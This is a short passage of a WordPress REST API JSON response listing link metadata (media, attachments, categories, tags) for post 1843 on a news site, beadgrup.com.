ble":true,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/media\/1844"}],"wp:attachment":[{"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/media?parent=1843"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/categories?post=1843"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/tags?post=1843"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}